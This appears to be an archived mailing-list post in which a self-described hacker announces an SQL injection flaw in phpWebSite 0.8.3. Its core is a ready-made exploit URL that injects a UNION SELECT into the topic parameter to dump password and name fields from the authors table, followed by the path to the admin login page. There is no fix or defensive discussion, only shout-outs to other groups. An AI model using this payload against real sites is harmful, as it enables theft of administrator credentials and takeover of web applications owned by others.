<<< Date Index >>>     <<< Thread Index >>>

sql injection in phpWebSite 0.8.3



hi to all .. 

forum type : phpWebSite 0.8.3
bug found by : black-code
team : site-down
type : sql injection

code:

www.xxx.com/path/topics.php?op=viewtopic&topic=-1%20Union%20select%20null,null,pwd,name%20From%20authors


path to admin login:

http://www.xxx.com/admin.php

All my respect to my friend sweet-devil , lezr.com , g123g.net ..

done .. peace